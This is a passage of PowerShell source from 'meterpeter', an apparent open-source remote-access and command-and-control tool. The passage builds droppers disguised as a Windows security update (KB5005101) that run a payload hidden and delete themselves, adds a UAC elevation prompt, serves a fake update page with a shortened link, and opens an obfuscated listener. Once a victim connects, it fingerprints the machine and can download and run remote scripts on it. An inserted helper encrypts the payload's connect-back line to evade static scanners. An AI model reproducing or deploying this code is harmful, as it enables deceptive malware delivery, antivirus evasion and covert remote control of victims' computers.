Green;\r\n    write-Host \"   ---------      ------                ----------\";\r\n    write-Host \"   NotInstalled   Update-KB5005101.ps1  $IPATH\";write-host \"`n`n\";\r\n    Write-Host \"[i] Manualy Deliver '$payload_name.ps1' (Client) to Target\" -ForeGroundColor Black -BackGroundColor white;\r\n    Write-Host \"[*] Remark: Install Python3 (http.server) to Deliver payloads ..\" -ForeGroundColor yellow;\r\n    Write-Host \"[*] Remark: Dropper Demonstration $payload_name.bat created ..\" -ForeGroundColor yellow;\r\n\r\n## Function for @Daniel_Durnea\r\n# That does not have Python3 (http.server) installed to build Drop`pers (download crandles)\r\n# This Demostration Drop`per allow us to execute payload.ps1 in a hidden terminal windows ;)\r\n$DemoDropper = @(\"#echo off\r\npowershell (New-Object -ComObject Wscript.Shell).Popup(`\"Executing $payload_name.ps1 payload`\",4,`\"$payload_name Security Update`\",0+64)\r\npowershell -WindowStyle hidden -File $payload_name.ps1\r\ndel `\"%~f0`\"\")\r\necho $DemoDropper|Out-File \"$payload_name.bat\" -Encoding string -Force\r\n((Get-Content -Path 
\"$payload_name.bat\" -Raw) -Replace \"#\",\"@\")|Set-Content -Path \"$payload_name.bat\"\r\n\r\n  }\r\n}\r\nelse\r\n{\r\n  ## Attacker: Linux - Apache2 webserver\r\n  # Deliver Dro`pper.zip using Apache2 webserver\r\n  write-Host \"   WebServer    Client                Dropper               WebRoot\" -ForegroundColor Green;\r\n  write-Host \"   ---------    ------                -------               -------\";\r\n  write-Host \"   Apache2      Update-KB5005101.ps1  Update-KB5005101.zip  $APACHE\";write-host \"`n`n\";\r\n  Copy-Item -Path $IPATH$payload_name.ps1 -Destination $APACHE$payload_name.ps1 -Force;\r\n\r\n  If($FlavorSellection -eq 2)\r\n  {\r\n    \r\n       <#\r\n       .SYNOPSIS\r\n          Author: @r00t-3xp10it\r\n          Helper - meterpeter payload HTA drop`per application\r\n       #>\r\n\r\n       cd $Bin\r\n       #delete old files left behind by previous executions\r\n       If(Test-Path -Path \"$Dropper_Name.hta\" -EA SilentlyContinue)\r\n       {\r\n          Remove-Item -Path \"$Dropper_Name.hta\" -Force\r\n       }\r\n\r\n       #Make sure HTA template exists before go any further\r\n       If(-not(Test-Path -Path \"Update.hta\" -EA SilentlyContinue))\r\n       {\r\n          Write-Host \"ERROR: file '${Bin}Update.hta' not found ...\" -ForeGroundColor Red -BackGroundColor Black\r\n          Write-Host \"`n\";exit #Exit @Meterpeter\r\n       }\r\n \r\n       #Replace the server ip addr + port on HTA template\r\n       ((Get-Content -Path \"Update.hta\" -Raw) -Replace \"CharlieBrown\",\"$Server_port\")|Set-Content -Path \"Update.hta\"\r\n\r\n       #Embebed meterpter icon on HTA application?\r\n       #iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/theme/meterpeter.ico\" -OutFile \"meterpeter.ico\"|Out-Null\r\n       #Start-Process -WindowStyle hidden cmd.exe -ArgumentList \"/R COPY /B meterpeter.ico+Update.hta $Dro`pper_Name.hta\" -Wait\r\n\r\n       #Compress HTA application and port the ZIP archive to 
'webroot' directory!\r\n       #Stage the patched template under the dropper file name before compressing it\r\n       Copy-Item -Path \"Update.hta\" -Destination \"$Dropper_Name.hta\" -Force\r\n       Compress-Archive -LiteralPath \"$Dropper_Name.hta\" -DestinationPath \"${APACHE}${Dropper_Name}.zip\" -Force\r\n\r\n       #Revert original HTA to default to be used again\r\n       ((Get-Content -Path \"Update.hta\" -Raw) -Replace \"$Server_port\",\"CharlieBrown\")|Set-Content -Path \"Update.hta\"\r\n\r\n       #Delete artifacts left behind\r\n       #Remove-Item -Path \"meterpeter.ico\" -EA SilentlyContinue -Force\r\n       Remove-Item -Path \"$Dropper_Name.hta\" -EA SilentlyContinue -Force\r\n\r\n       #return to meterpeter working directory (meterpeter)\r\n       cd $IPATH\r\n    \r\n    }\r\n    Else\r\n    {\r\n    \r\n       <#\r\n       .SYNOPSIS\r\n          Author: @r00t-3xp10it\r\n          Helper - meterpeter payload BAT dro`pper script\r\n       #>\r\n\r\n       Copy-Item -Path \"$Bin$Dropper_Name.bat\" -Destination \"${Bin}BACKUP.bat\"|Out-Null\r\n       ## (ZIP + add LHOST) to drop`per.bat before sending it to the apache2 webroot ..\r\n       ((Get-Content -Path $Bin$Dropper_Name.bat -Raw) -Replace \"CharlieBrown\",\"$Local_Host\")|Set-Content -Path $Bin$Dropper_Name.bat;\r\n\r\n       $RunEXElevated = Read-Host \"[i] Make dropper spawn UAC dialog to run elevated? (y|n)\"\r\n       If($RunEXElevated -iMatch '^(y|yes)$')\r\n       {\r\n\r\n          <#\r\n          .SYNOPSIS\r\n             Author: @r00t-3xp10it\r\n             Helper - Execute Batch with administrator privileges?\r\n\r\n          .NOTES\r\n             This function adds a cmdline to the beginning of the bat file that uses\r\n             the 'Net Session' command to check for admin privs before executing powershell\r\n             -ru`nas on the current process, spawning a UAC confirmation dialog box.\r\n          #>\r\n\r\n          $MyRunes = \"r\" + \"una\" + \"s\" -join ''\r\n          #TODO: run bat with admin privs ??? 
-> requires LanManServer (server) service active\r\n          ((Get-Content -Path $Bin$Dropper_Name.bat -Raw) -Replace \"@echo off\",\"@echo off`nsc query `\"lanmanserver`\"|find `\"RUNNING`\" >nul`nif %ERRORLEVEL% EQU 0 (`n  Net session >nul 2>&1 || (PowerShell start -verb $MyRunes '%~0' &exit /b)`n)\")|Set-Content -Path $Bin$Dropper_Name.bat\r\n       }\r\n\r\n       Compress-Archive -LiteralPath $Bin$Dropper_Name.bat -DestinationPath $APACHE$Dropper_Name.zip -Force;\r\n       #Revert original BAT to default to be used again\r\n       Remove-Item -Path \"$Bin$Dropper_Name.bat\" -Force\r\n       Copy-Item -Path \"${Bin}BACKUP.bat\" -Destination \"$Bin$Dropper_Name.bat\"|Out-Null\r\n       Remove-Item -Path \"${Bin}BACKUP.bat\" -Force\r\n\r\n    }\r\n\r\n\r\n  #write onscreen\r\n  write-Host \"[i] Send the URL generated to target to trigger download.\"\r\n  Copy-Item -Path \"${IPATH}\\Mimiratz\\theme\\Catalog.png\" -Destination \"${APACHE}Catalog.png\"|Out-Null\r\n  Copy-Item -Path \"${IPATH}\\Mimiratz\\theme\\favicon.png\" -Destination \"${APACHE}favicon.png\"|Out-Null\r\n  Copy-Item -Path \"${IPATH}\\Mimiratz\\theme\\Update-KB5005101.html\" -Destination \"${APACHE}Update-KB5005101.html\"|Out-Null\r\n  ((Get-Content -Path \"${APACHE}Update-KB5005101.html\" -Raw) -Replace \"henrythenavigator\",\"$Dropper_Name\")|Set-Content -Path \"${APACHE}Update-KB5005101.html\"\r\n\r\n  Write-Host \"[i] Attack Vector: http://$Local_Host/$Dropper_Name.html\" -ForeGroundColor Black -BackGroundColor white;\r\n\r\n  #Shorten Url function\r\n  $Url = \"http://$Local_Host/$Dropper_Name.html\"\r\n  $tinyUrlApi = 'http://tinyurl.com/api-create.php'\r\n  $response = Invoke-WebRequest (\"{0}?url={1}\" -f $tinyUrlApi, $Url)\r\n  $response.Content|Out-File -FilePath \"$Env:TMP\\sHORTENmE.meterpeter\" -Force\r\n  $GetShortenUrl = Get-Content -Path \"$Env:TMP\\sHORTENmE.meterpeter\"\r\n  Write-Host \"[i] Shorten Uri  : $GetShortenUrl\" -ForeGroundColor Black -BackGroundColor white\r\n  
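## Added worked example (editor's code, not part of the original meterpeter source): a\r\n  ## round-trip of the ConvertFrom-SecureString -Key / ConvertTo-SecureString -Key mechanism\r\n  ## that NetworkStats uses to hide the 'New-Object System.Net.Sockets.TCPClient' line in\r\n  ## the payload. Protect-C2String and Unprotect-C2String are placeholder names chosen for\r\n  ## this example; the 32-byte key (AES-256) matches the $Key the generator builds above.\r\n  function Protect-C2String([string]$Ip,[string]$Port,[byte[]]$Key)\r\n  {\r\n     ## Generator side: encrypt the connect line with the raw key and hand the key over as\r\n     ## Base64, which is what NetworkStats substitutes into the '#' (blob) and '@' (key) slots.\r\n     $Plain = \"New-Object System.Net.Sockets.TCPClient('$Ip','$Port')\"\r\n     $Blob  = ConvertTo-SecureString $Plain -AsPlainText -Force | ConvertFrom-SecureString -Key $Key\r\n     Return @{ Blob = $Blob; Base64Key = [System.Convert]::ToBase64String($Key) }\r\n  }\r\n  function Unprotect-C2String([string]$Blob,[string]$Base64Key)\r\n  {\r\n     ## Client side (and analyst side): rebuild the key from Base64, turn the blob back into\r\n     ## a SecureString and marshal it to plain text, as the generated client does before\r\n     ## invoking it. The BSTR is zeroed and freed so the plaintext does not linger in memory.\r\n     $RawKey = [System.Convert]::FromBase64String($Base64Key)\r\n     $Secure = $Blob | ConvertTo-SecureString -Key $RawKey\r\n     $Bstr   = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Secure)\r\n     Try     { Return [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($Bstr) }\r\n     Finally { [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($Bstr) }\r\n  }\r\n  ## Usage (not executed here; the address and port are made-up sample values):\r\n  ##   $k = 1..32 | % {[byte](Get-Random -Minimum 0 -Maximum 256)}\r\n  ##   $p = Protect-C2String -Ip '192.168.1.10' -Port '666' -Key $k\r\n  ##   Unprotect-C2String -Blob $p.Blob -Base64Key $p.Base64Key   # returns the TCPClient line\r\n  ## To recover the C2 endpoint from a captured payload, feed the Base64 string assigned to\r\n  ## $2 and the blob assigned to $3 in the generated client into Unprotect-C2String: the key\r\n  ## ships inside the payload, so the encryption only hides the string from static scanners.\r\n  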
Remove-Item -Path \"$Env:TMP\\sHORTENmE.meterpeter\" -Force\r\n\r\n}\r\n$check = $Null;\r\n$python_port = $Null;\r\n$Server_port = $Null;\r\n$Python_version = $Null;\r\n## End of venom function\r\n\r\n\r\nIf($RunEXElevated -iMatch '^(y|yes)$')\r\n{\r\n   <#\r\n   .SYNOPSIS\r\n      Author: @r00t-3xp10it\r\n      Helper - Add UAC elevation to payload.ps1\r\n\r\n   .NOTES\r\n     This migth trigger av detection on payload (danger)\r\n     @Ahmed_Ben_Mhamed uses the payload.PS1 of meterpeter C2\r\n     to expl`oit targets over WAN networks, but UAC elevation\r\n     its only available by default in drop`pers. (untill now) \r\n   #>\r\n\r\n   $OLD = (Get-Content -Path \"${IPATH}${payload_name}.ps1\" -Raw)\r\n   echo \"`$Bi0s = (`\"#Ru`\"+`\"nA#s`\" -Join '') -replace '#',''\" > \"${IPATH}${payload_name}.ps1\"\r\n   echo \"If(-not([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))\" >> \"${IPATH}${payload_name}.ps1\"\r\n   echo \"{\" >> \"${IPATH}${payload_name}.ps1\"\r\n   echo \"  Start-Process -WindowStyle hidden powershell.exe `\"-File`\",('`\"{0}`\"' -f `$MyInvocation.MyCommand.Path) -Verb `$Bi0s\" >> \"${IPATH}${payload_name}.ps1\"\r\n   echo \"  exit\" >> \"${IPATH}${payload_name}.ps1\"\r\n   echo \"}`n\" >> \"${IPATH}${payload_name}.ps1\"\r\n   echo \"$OLD\" >> \"${IPATH}${payload_name}.ps1\"\r\n}\r\n\r\n\r\n$ola = 'Creat' + 'eInstance' -join ''\r\n$Bytes = [System.Byte[]]::$ola([System.Byte],1024);\r\nWrite-Host \"[*] Listening on LPort: $Local_Port tcp\";\r\n\r\n## $Socket - Obfuscat`ion\r\n${/$.}=+$(  )  ;  ${).!}  =${/$.}  ;${#~}  =  ++  ${/$.}  ;  ${[/}  =(  ${/$.}  =${/$.}  +  ${#~}  )  ;${.-}  =  (  ${/$.}  =${/$.}+  ${#~}  );  ${.$)}=  (${/$.}  =  ${/$.}  +${#~}  )  ;${/@}  =  (${/$.}  =${/$.}+${#~}  )  ;${)/}=(${/$.}=${/$.}+${#~}  )  ;  ${#-*}  =(  ${/$.}=  ${/$.}+  ${#~});${;}=  (${/$.}  =${/$.}+  ${#~}  )  ;${``[@}  =  (${/$.}  =  ${/$.}+${#~}  )  
;${[}=  \"[\"  +  \"$(  @{}  )  \"[${#-*}]+  \"$(@{  })\"[  \"${#~}\"  +  \"${``[@}\"]+\"$(  @{}  )  \"[\"${[/}\"  +  \"${).!}\"]+  \"$?\"[${#~}  ]  +  \"]\"  ;${/$.}  =  \"\".(\"$(@{  })  \"[  \"${#~}${.$)}\"]+\"$(@{  })\"[\"${#~}${)/}\"]+\"$(  @{  }  )  \"[  ${).!}  ]  +\"$(  @{  })  \"[${.$)}]  +\"$?  \"[${#~}  ]+\"$(  @{})  \"[${.-}]  )  ;  ${/$.}=  \"$(  @{  }  )  \"[\"${#~}\"+  \"${.$)}\"]  +  \"$(  @{})  \"[  ${.$)}  ]  +\"${/$.}\"[  \"${[/}\"  +\"${#-*}\"]  ;&${/$.}  (\"  ${/$.}  (${[}${.-}${)/}+  ${[}${;}${.-}+  ${[}${#~}${#~}${#~}+${[}${``[@}${``[@}  +  ${[}${#~}${).!}${#-*}+  ${[}${#~}${).!}${#~}+${[}${#~}${#~}${)/}+${[}${.-}${[/}+  ${[}${)/}${#~}  +${[}${.-}${[/}+${[}${#-*}${;}  +${[}${#~}${).!}${#~}  +${[}${#~}${#~}${``[@}+  ${[}${.$)}${/@}+${[}${#-*}${``[@}+  ${[}${``[@}${;}+  ${[}${#~}${).!}${)/}  +${[}${#~}${).!}${#~}  +  ${[}${``[@}${``[@}  +${[}${#~}${#~}${)/}  +${[}${.-}${[/}  +${[}${;}${.-}+${[}${#~}${[/}${#~}  +${[}${#~}${#~}${/@}+${[}${#~}${#~}${)/}  +${[}${#~}${).!}${#~}+  ${[}${#~}${).!}${``[@}  +  ${[}${.$)}${)/}  +  ${[}${#-*}${;}  +  ${[}${#~}${).!}${#~}+  ${[}${#~}${#~}${)/}  +  ${[}${.$)}${)/}+  ${[}${;}${.-}  +  ${[}${#~}${#~}${#~}+${[}${``[@}${``[@}+${[}${#~}${).!}${#-*}+  ${[}${#~}${).!}${#~}  +  ${[}${#~}${#~}${)/}  +${[}${#~}${#~}${/@}  +${[}${.$)}${)/}  +  ${[}${;}${.$)}  +${[}${``[@}${``[@}  +  ${[}${#~}${#~}${[/}+  ${[}${#-*}${)/}+  ${[}${#~}${).!}${/@}+${[}${#~}${#~}${/@}  +  ${[}${#~}${#~}${)/}+${[}${#~}${).!}${#~}  +${[}${#~}${#~}${).!}  +  ${[}${#~}${).!}${#~}  +${[}${#~}${#~}${.$)}  +  ${[}${.$)}${).!}+${[}${.-}${``[@}  +${[}${.$)}${;}+${[}${.$)}${)/}  +${[}${.$)}${;}  +${[}${.$)}${)/}  +  ${[}${.$)}${;}  +  ${[}${.$)}${)/}+  ${[}${.$)}${;}  +  ${[}${.-}${``[@}  +${[}${.$)}${.$)}  +  ${[}${.-}${)/}+  ${[}${#-*}${)/}+${[}${#~}${#~}${#~}+  ${[}${``[@}${``[@}+${[}${``[@}${#-*}  +${[}${#~}${).!}${;}+  ${[}${``[@}${/@}  +${[}${;}${).!}  +${[}${#~}${#~}${#~}  +${[}${#~}${#~}${.$)}+${[}${#~}${#~}${)/}  +  ${[}${.$)}${#~}  
+${[}${/@}${``[@}  )\")\r\n\r\n$Socket.Start();\r\n$Client = $Socket.AcceptTcpClient();\r\n$Remote_Host = $Client.Client.RemoteEndPoint.Address.IPAddressToString\r\nWrite-Host \"[-] Beacon received: \" -ForegroundColor Green -NoNewline\r\nWrite-Host \"$Remote_Host\" -ForegroundColor Red\r\n\r\n\r\n## Connection Banner\r\n$ConnectionBanner = @\"\r\n\r\n    _____________           _____________\r\n   |.-----------.|         |.-----------.|\r\n   ||           ||         ||           ||\r\n   ||   Local   ||  <==>   ||   Remote  ||  \r\n   ||___________||         ||___________||\r\n   __'---------'__         __'---------'__\r\n  [:::: ::::::::::]       [:::::::::: ::::]\r\n\"@;\r\nwrite-host $ConnectionBanner\r\nwrite-host \"    $Local_Host\" -ForegroundColor Green -NoNewline\r\nwrite-host \"            $Remote_Host`n\" -ForegroundColor Red\r\n\r\n\r\n#Play sound on session creation\r\n$PlayWav = New-Object System.Media.SoundPlayer\r\n$PlayWav.SoundLocation = \"${IPATH}\\Mimiratz\\theme\\ConnectionAlert.wav\"\r\n$PlayWav.playsync();\r\n\r\n$Stream = $Client.GetStream();\r\n$WaitData = $False;\r\n$Info = $Null;\r\n\r\n$RhostWorkingDir = Char_Obf(\"(Get-location).Path\");\r\n$Processor = Char_Obf(\"(Get-WmiObject Win32_processor).Caption\");\r\n$Name = Char_Obf(\"(Get-WmiObject Win32_OperatingSystem).CSName\");\r\n$System = Char_Obf(\"(Get-WmiObject Win32_OperatingSystem).Caption\");\r\n$Version = Char_Obf(\"(Get-WmiObject Win32_OperatingSystem).Version\");\r\n$serial = Char_Obf(\"(Get-WmiObject Win32_OperatingSystem).SerialNumber\");\r\n$syst_dir = Char_Obf(\"(Get-WmiObject Win32_OperatingSystem).SystemDirectory\");\r\n$Architecture = Char_Obf(\"(Get-WmiObject Win32_OperatingSystem).OSArchitecture\");\r\n$WindowsDirectory = Char_Obf(\"(Get-WmiObject Win32_OperatingSystem).WindowsDirectory\");\r\n$RegisteredUser = Char_Obf(\"(Get-CimInstance -ClassName Win32_OperatingSystem).RegisteredUser\");\r\n$BootUpTime = Char_Obf(\"(Get-CimInstance -ClassName 
Win32_OperatingSystem).LastBootUpTime.ToString()\");\r\n\r\n#Sysinfo command at first time run (connection)\r\n$Command = \"cd `$Env:TMP;`\"      DomainName     : `\"+$Name+`\"``n      Architecture   : `\"+$Architecture+`\"``n      RemoteHost     : `\"+`\"$Remote_Host`\"+`\"``n      BootUpTime     : `\"+$BootUpTime+`\"``n      RegisteredUser : `\"+$RegisteredUser+`\"``n      OP System      : `\"+$System+`\"``n      OP Version     : `\"+$Version+`\"``n      SystemDir      : `\"+$syst_dir+`\"``n      WorkingDir     : `\"+$RhostWorkingDir+`\"``n      ProcessorCPU   : `\"+$Processor;If(Get-Process wscript -EA SilentlyContinue){Stop-Process -Name wscript -Force}\";\r\n\r\n\r\nWhile($Client.Connected)\r\n{\r\n  If(-not ($WaitData))\r\n  {\r\n    If(-not ($Command))\r\n    {\r\n      $Flipflop = \"False\";\r\n      Write-Host \"`n - press 'Enter' to continue ..\" -NoNewline;\r\n      $continue = Read-Host;\r\n      Clear-Host;\r\n      Write-Host $Modules;\r\n      Write-Host \"`n :meterpeter> \" -NoNewline -ForeGroundColor Green;\r\n      $Command = Read-Host;\r\n    }\r\n\r\n\r\n    If($Command -ieq \"Modules\")\r\n    {\r\n      Clear-Host;\r\n      Write-Host \"`n$Modules\";\r\n      $Command = $Null;\r\n    }\r\n\r\n    If($Command -ieq \"Info\")\r\n    {\r\n      Write-Host \"`n`n$Info\";\r\n      $Command = $Null;\r\n    }\r\n\r\n    If($Command -ieq \"Session\")\r\n    {\r\n      ## Check if client (target machine) is still connected ..\r\n      $ParseID = \"$Local_Host\"+\":\"+\"$Local_Port\" -Join ''\r\n      $SessionID = netstat -ano | Select-String \"$ParseID\" | Select-Object -First 1\r\n      $AllSettings = Get-NetAdapter | Select-Object * | Where-Object { $_.Status -iMatch '^(Up)$' }\r\n      $Netdesc = ($AllSettings).InterfaceDescription\r\n      $NetSped = ($AllSettings).LinkSpeed\r\n      $NetAdpt = ($AllSettings).Name\r\n\r\n      write-host \"`n`n    Connection : \" -NoNewline;\r\n      write-host \"$NetAdpt\" -ForegroundColor DarkGray -NoNewline;\r\n  
    write-host \" LinkSpeed: \" -NoNewline;\r\n      write-host \"$NetSped\" -ForegroundColor DarkGray\r\n      write-host \"    Description: \" -NoNewline\r\n      write-host \"$Netdesc\" -ForegroundColor Red\r\n\r\n      Write-Host \"`n    Proto  Local Address          Foreign Address        State           PID\" -ForeGroundColor green;\r\n      Write-Host \"    -----  -------------          ---------------        -----           ---\";\r\n      ## Display connections statistics\r\n      If(-not($SessionID) -or $SessionID -eq \" \")\r\n      {\r\n        Write-Host \"    No connections found                                (Client Disconnected)\" -ForeGroundColor Red\r\n      } Else {\r\n        Write-Host \"  $SessionID\"\r\n      }\r\n\r\n      write-host \"\"\r\n      $Command = $Null;\r\n    }\r\n\r\n    If($Command -ieq \"Pranks\")\r\n    {\r\n      write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n      write-host \"   Remote pranks manager\";\r\n      write-host \"`n`n   Modules        Description\" -ForegroundColor green;\r\n      write-host \"   -------        -----------\";\r\n      write-host \"   Msgbox         Spawn remote msgbox manager\";\r\n      write-host \"   Speak          Make remote host speak one phrase\";\r\n      write-host \"   OpenUrl        Open\\spawn URL in default browser\";\r\n      write-host \"   GoogleX        Browser google easter eggs manager\";\r\n      write-host \"   WindowsUpdate  Fake windows update full screen prank\";\r\n      write-host \"   CriticalError  Prank that fakes a critical system error\";\r\n      write-host \"   BallonTip      Show a balloon tip in the notification bar\";\r\n      write-host \"   Nodrives       Hide All Drives (C:D:E:F:G) From Explorer\";\r\n      write-host \"   LabelDrive     Rename drive letter (C:) label From Explorer\";\r\n      write-host \"   Return         Return to Server Main Menu\" -ForeGroundColor yellow\r\n      write-host \"`n`n :meterpeter:Pranks> \" -NoNewline 
-ForeGroundColor Green;\r\n      $choise = Read-Host;\r\n      If($choise -ieq \"BallonTip\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow\r\n         write-host \"   This module spawn a ballontip in the notification bar\"\r\n         write-host \"   Parameter IconType accepts values: Info,Warning,Error\"\r\n         write-host \"   Parameter CloseTime accepts milliseconds (example: 10000)\"\r\n         write-host \"`n`n   Modules  Description                    Privileges Required\" -ForegroundColor green\r\n         write-host \"   -------  -----------                    -------------------\"\r\n         write-host \"   Spawn    ballontip in notification bar  UserLand\"\r\n         write-host \"   Return   Return to Server Main Menu\" -ForeGroundColor yellow\r\n         write-host \"`n`n :meterpeter:Pranks:BallonTip> \" -NoNewline -ForeGroundColor Green\r\n         $Prank_choise = Read-Host;\r\n         If($Prank_choise -ieq \"Spawn\")\r\n         {\r\n            write-host \" - BallonTip Title     : \" -NoNewline\r\n            $Title = Read-Host\r\n            If([string]::IsNullOrEmpty($Title))\r\n            {\r\n               $Title = \"Attention `$Env:USERNAME\"\r\n               write-host \"   => Error: wrong input, default to: '$Title'\" -ForegroundColor Red\r\n            }\r\n\r\n            write-host \" - BallonTip Text      : \" -NoNewline\r\n            $Text = Read-Host\r\n            If([string]::IsNullOrEmpty($Text))\r\n            {\r\n               $Text = \"A vir`us has detected in `$Env:COMPUTERNAME\"\r\n               write-host \"   => Error: wrong input, default to: '$Text'\" -ForegroundColor Red\r\n            }\r\n\r\n            write-host \" - BallonTip IconType  : \" -NoNewline\r\n            $IconType = Read-Host\r\n            If([string]::IsNullOrEmpty($IconType))\r\n            {\r\n               $IconType = \"Warning\"\r\n               write-host \"   => Error: wrong input, default to: 
'$IconType'\" -ForegroundColor Red\r\n            }\r\n\r\n            write-host \" - BallonTip CloseTime : \" -ForegroundColor DarkYellow -NoNewline\r\n            $CloseTime = Read-Host\r\n            If([string]::IsNullOrEmpty($CloseTime))\r\n            {\r\n               $CloseTime = \"10000\"\r\n               write-host \"   => Error: wrong input, default to: '$CloseTime'\" -ForegroundColor Red\r\n            }\r\n\r\n            write-host \" * Spawn a ballontip in the notification bar ..\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n            $Command = \"cd `$Env:TMP;iwr -Uri 'https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Misc-CmdLets/Show-BalloonTip.ps1' -OutFile 'Show-BalloonTip.ps1'|Unblock-File;powershell -file `$Env:TMP\\Show-BalloonTip.ps1 -title `\"$Title`\" -text `\"$Text`\" -icontype `\"$IconType`\" -autoclose `\"$CloseTime`\";Remove-Item -Path `$Env:TMP\\Show-BalloonTip.ps1 -Force\"\r\n         }\r\n         If($Prank_choise -ieq \"Return\" -or $Prank_choise -ieq \"cls\" -or $Prank_choise -ieq \"modules\" -or $Prank_choise -ieq \"clear\")\r\n         {\r\n            $choise = $Null;\r\n            $Command = $Null;\r\n            $Prank_choise = $Null;\r\n         }      \r\n      }\r\n      If($choise -ieq \"WindowsUpdate\" -or $choise -ieq \"WU\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow\r\n         write-host \"   This module opens the target default web browser in fakeupdate.net\"\r\n         write-host \"   in full screen mode. 
Faking that a Windows update is occurring.\"\r\n         write-host \"   Remark: Target needs to press F11 to exit the full screen prank.\" -ForegroundColor Yellow\r\n         write-host \"`n`n   Modules  Description                  Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------  -----------                  -------------------\";\r\n         write-host \"   Start    execute prank in background  UserLand\";\r\n         write-host \"   Return   Return to Server Main Menu\" -ForeGroundColor yellow\r\n         write-host \"`n`n :meterpeter:Pranks:WU> \" -NoNewline -ForeGroundColor Green;\r\n         $Prank_choise = Read-Host;\r\n         If($Prank_choise -ieq \"Start\")\r\n         {\r\n            write-host \" * Faking windows system update ..`n\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n            $Command = \"powershell cd `$Env:TMP;iwr -Uri 'https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/FWUprank.ps1' -OutFile 'FWUprank.ps1'|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList '-file FWUprank.ps1 -autodelete on';echo '   `> Windows system update prank running in background!' 
`> trash.mtp;echo '   `> URI: https://fakeupdate.net/[SystemOS]/~{F11}' `>`> trash.mtp;Get-Content trash.mtp;Remove-Item trash.mtp -Force\"\r\n         }\r\n         If($Prank_choise -ieq \"Return\" -or $Prank_choise -ieq \"cls\" -or $Prank_choise -ieq \"modules\" -or $Prank_choise -ieq \"clear\")\r\n         {\r\n            $choise = $Null;\r\n            $Command = $Null;\r\n            $Prank_choise = $Null;\r\n         }\r\n      }\r\n      If($choise -ieq \"LabelDrive\" -or $choise -ieq \"Label\")\r\n      {\r\n        write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n        write-host \"   Module to rename drive label\";\r\n        write-host \"`n`n   Modules   Description                     Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------   -----------                     -------------------\";\r\n        write-host \"   List      ALL drives available            UserLand\" \r\n        write-host \"   Rename    Rename drive letter label       \" -NoNewline;\r\n        write-host \"Administrator\" -ForegroundColor Red;\r\n        write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n :meterpeter:Pranks:Label> \" -NoNewline -ForeGroundColor Green;\r\n        $choise_two = Read-Host;\r\n        If($choise_two -ieq \"List\")\r\n        {\r\n           write-host \" * Listing all drives available ..\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"`n\";\r\n           $Command = \"`$PSVERSION = (`$Host).version.Major;If(`$PSVERSION -gt 5){Get-PSDrive -PSProvider 'FileSystem'|Select-Object Root,CurrentLocation,Used,Free|ft|Out-File dellog.txt}Else{Get-Volume|Select-Object DriveLetter,FileSystemLabel,FileSystemType,DriveType,HealthStatus,SizeRemaining,Size|FT|Out-File dellog.txt};Get-Content dellog.txt;Remove-Item dellog.txt -Force\";\r\n        }\r\n        If($choise_two -ieq \"Rename\")\r\n        {\r\n          $MyDrive = Read-Host \" - DriveLetter to 
change the label (C)\"\r\n          $MyDName = Read-Host \" - Drive new Friendly Name (Armagedon)\"\r\n          write-host \" * Rename Drive ${MyDrive}: label to [\" -ForegroundColor Green -NoNewline\r\n          write-host \"$MyDName\" -ForegroundColor Red -NoNewline;\r\n          write-host \"]\" -ForegroundColor Green;\r\n          \r\n          Start-Sleep -Seconds 1;write-host \"`n\";\r\n          $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){If(-not(Test-Path -Path `\"${MyDrive}:`\")){echo `\"   [${MyDrive}:] Drive letter not found ..``n`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force}Set-Volume -DriveLetter $MyDrive -NewFileSystemLabel `\"$MyDName`\";Start-Sleep -Seconds 1;Get-Volume -DriveLetter $MyDrive|Select-Object DriveLetter,FileSystemLabel,FileSystemType,HealthStatus,SizeRemaining,Size|FT}Else{echo `\"   [i] Client Admin Privileges Required (run as administrator)``n`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force}\";\r\n        }\r\n        If($choise_two -ieq \"Return\" -or $choise_two -ieq \"cls\" -or $choise_two -ieq \"Modules\" -or $choise_two -ieq \"clear\")\r\n        {\r\n           $Command = $Null;\r\n           $choise_two = $Null;\r\n        }\r\n      }\r\n      If($choise -ieq \"Nodrives\")\r\n      {\r\n        write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n        write-host \"   Module to enable\\disable the display of drives\";\r\n        write-host \"   under Explorer (modify Explorer HKCU policy key)\";\r\n        write-host \"`n`n   Modules   Description                     Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------   -----------                     -------------------\";\r\n        write-host \"   Disable   Hide Drives from explorer       \" -NoNewline;\r\n        write-host \"Administrator\" -ForegroundColor Red;\r\n        write-host \"   Enable    
